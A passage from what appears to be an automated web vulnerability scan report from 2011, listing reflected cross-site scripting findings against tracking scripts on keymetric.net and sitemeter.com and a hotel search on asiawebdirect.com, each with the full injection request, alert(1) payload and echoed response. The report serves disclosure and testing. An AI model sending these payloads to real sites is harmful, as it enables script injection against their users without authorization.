Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:02 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5121

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
val = 'unk'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmc1':
val = '95c71';alert(1)//e91e1825f03'; break;
case 'kmc1':
val = '95c71';alert(1)//e91e1825f03'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc3':
...[SNIP]...

4.72. http://km5002.keymetric.net/KM2.js [lc2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6e50'%3balert(1)//0a22ede9ff4 was submitted in the lc2 parameter. This input was echoed as f6e50';alert(1)//0a22ede9ff4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=f6e50'%3balert(1)//0a22ede9ff4&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:05 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5121

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmc1':
val = 'N/A'; break;
case 'kmc1':
val = 'N/A'; break;
case 'kmc2':
val = 'f6e50';alert(1)//0a22ede9ff4'; break;
case 'kmc2':
val = 'f6e50';alert(1)//0a22ede9ff4'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
...[SNIP]...

4.73. http://km5002.keymetric.net/KM2.js [lc3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc3 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd63f'%3balert(1)//1018bb0840 was submitted in the lc3 parameter. This input was echoed as bd63f';alert(1)//1018bb0840 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=bd63f'%3balert(1)//1018bb0840&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:07 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5119

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc1':
val = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc3':
val = 'bd63f';alert(1)//1018bb0840'; break;
case 'kmc3':
val = 'bd63f';alert(1)//1018bb0840'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':

...[SNIP]...

4.74. http://km5002.keymetric.net/KM2.js [lc4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc4 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2faf9'%3balert(1)//19411599e76 was submitted in the lc4 parameter. This input was echoed as 2faf9';alert(1)//19411599e76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=2faf9'%3balert(1)//19411599e76&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:10 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5121

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
val = '2faf9';alert(1)//19411599e76'; break;
case 'kmc4':
val = '2faf9';alert(1)//19411599e76'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmrd':
...[SNIP]...

4.75. http://km5002.keymetric.net/KM2.js [lc5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc5 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1597d'%3balert(1)//c54634f485d was submitted in the lc5 parameter. This input was echoed as 1597d';alert(1)//c54634f485d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=1597d'%3balert(1)//c54634f485d&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:12 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5121

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':
val = '1597d';alert(1)//c54634f485d'; break;
case 'kmc5':
val = '1597d';alert(1)//c54634f485d'; break;
case 'kmrd':
val = 'Referrer information not available'; break;
case 'newvisit':
val
...[SNIP]...

4.76. http://km5002.keymetric.net/KM2.js [lca parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lca request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ab50'%3balert(1)//be7602a9b99 was submitted in the lca parameter. This input was echoed as 3ab50';alert(1)//be7602a9b99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=3ab50'%3balert(1)//be7602a9b99&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:57 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5092

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case 'kmas':
val = '0'; break;
case 'cpca':
val = '3ab50';alert(1)//be7602a9b99'; break;
case 'kmca':
val = '3ab50';alert(1)//be7602a9b99'; break;
case 'cpag':
val = 'AdGroup not provided'; break;
case 'kmag':
val = 'AdGroup not pro
...[SNIP]...

4.77. http://km5002.keymetric.net/KM2.js [lkw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lkw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0ff1'%3balert(1)//57054945980 was submitted in the lkw parameter. This input was echoed as c0ff1';alert(1)//57054945980 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=c0ff1'%3balert(1)//57054945980&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:47 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5095

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
= 'Campaign not provided'; break;
case 'cpag':
val = 'AdGroup not provided'; break;
case 'kmag':
val = 'AdGroup not provided'; break;
case 'kw':
val = 'c0ff1';alert(1)//57054945980'; break;
case 'kmkw':
val = 'c0ff1';alert(1)//57054945980'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmrq':
...[SNIP]...

4.78. http://km5002.keymetric.net/KM2.js [lmt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lmt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b760b'%3balert(1)//ea883eb4780 was submitted in the lmt parameter. This input was echoed as b760b';alert(1)//ea883eb4780 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=b760b'%3balert(1)//ea883eb4780&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:50 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5146

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'AdGroup not provided'; break;
case 'kw':
val = 'Keyword not provided'; break;
case 'kmkw':
val = 'Keyword not provided'; break;
case 'kmmt':
val = 'b760b';alert(1)//ea883eb4780'; break;
case 'kmmt':
val = 'b760b';alert(1)//ea883eb4780'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmrq':
val = 'Raw Query no
...[SNIP]...

4.79. http://km5002.keymetric.net/KM2.js [rho parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the rho request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a47b'%3balert(1)//aed1a99c366 was submitted in the rho parameter. This input was echoed as 2a47b';alert(1)//aed1a99c366 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=2a47b'%3balert(1)//aed1a99c366&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:52 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5059

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmrd':
val = '2a47b';alert(1)//aed1a99c366'; break;
case 'newvisit':
val = 'true'; break;
default:
val = 'undefined';
}
return val;
}
var km_Acct = '5002';
var cbd = km_GBD(window.location.hostname);
cbd
...[SNIP]...

4.80. http://km5002.keymetric.net/KM2.js [rqu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the rqu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3bd3'%3balert(1)//d1495a5981e was submitted in the rqu parameter. This input was echoed as d3bd3';alert(1)//d1495a5981e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=d3bd3'%3balert(1)//d1495a5981e&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:55 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5086

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...

case 'kmkw':
val = 'Keyword not provided'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmrq':
val = 'd3bd3';alert(1)//d1495a5981e'; break;
case 'kmrq':
val = 'd3bd3';alert(1)//d1495a5981e'; break;
case 'kmc1':
val = 'N/A'; break;
case 'kmc1':
val = 'N/A'; break;
case 'kmc2':
...[SNIP]...

4.81. http://km5002.keymetric.net/KM2.js [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f117'%3balert(1)//8ecc17aa05a was submitted in the vid parameter. This input was echoed as 8f117';alert(1)//8ecc17aa05a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=8f117'%3balert(1)//8ecc17aa05a&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:43 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5063

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
= km_GBD(window.location.hostname);
cbd = ((cbd=='localhost')?'':cbd);
kmSessionDur = 30;
kmSes = new Date();
kmSes.setTime(kmSes.getTime() + 1000 * 60 * kmSessionDur);
document.cookie = 'kmS5002=8f117';alert(1)//8ecc17aa05a;expires=' + kmSes.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmCookieDays = 365;
kmExt = new Date();
kmExt.setTime(kmExt.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cooki
...[SNIP]...

4.82. http://s31.sitemeter.com/js/counter.js [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s31.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc5a5'%3balert(1)//e81c2d1b33e was submitted in the site parameter. This input was echoed as bc5a5';alert(1)//e81c2d1b33e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=s31gamersdailynewsbc5a5'%3balert(1)//e81c2d1b33e HTTP/1.1
Host: s31.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 24 Jun 2011 13:30:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7334
Content-Type: application/x-javascript
Expires: Fri, 24 Jun 2011 13:40:46 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
ntListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s31gamersdailynewsbc5a5';alert(1)//e81c2d1b33e', 's31.sitemeter.com', '');

var g_sLastCodeName = 's31gamersdailynewsbc5a5';alert(1)//e81c2d1b33e';
// ]]>
...[SNIP]...

4.83. http://search.asiawebdirect.com/ [checkHotel%5BDestinationID%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.asiawebdirect.com
Path:   /

Issue detail

The value of the checkHotel%5BDestinationID%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66605"><script>alert(1)</script>865efa0e996ad9f5c was submitted in the checkHotel%5BDestinationID%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /?checkHotel%5BboxName%5D=phuket.com+small+box&checkHotel%5BAll%5D=1&pDestinationID=75&DestinationID=&checkHotel%5BLanguageCode%5D=en&checkHotel%5BPortal%5D=phuket.com&checkHotel%5BRsvnv%5D=2.0&checkHotel%5BDestinationID%5D=7566605"><script>alert(1)</script>865efa0e996ad9f5c&txtCheck_InShort=24%2F06%2F2011&txtCheck_OutShort=25%2F06%2F2011&checkHotel%5BsDay%5D=24&checkHotel%5BsMonth%5D=06&checkHotel%5BsYear%5D=2011&checkHotel%5BsMonth2%5D=06%2F2011&checkHotel%5BeDay%5D=25&checkHotel%5BeMonth%5D=06&checkHotel%5BeYear%5D=2011&checkHotel%5BeMonth2%5D=06%2F2011&checkHotel%5BNights%5D=1&checkHotel%5BTotalAdults%5D=2&checkHotel%5BTotalChildren%5D=0&checkHotel%5BTotalRooms%5D=1&Submit=search HTTP/1.1
Host: search.asiawebdirect.com
Proxy-Connection: keep-alive
Referer: http://www.phuket.com/islands/index.htm
Cache-Control: max-age=0
Origin: http://www.phuket.com
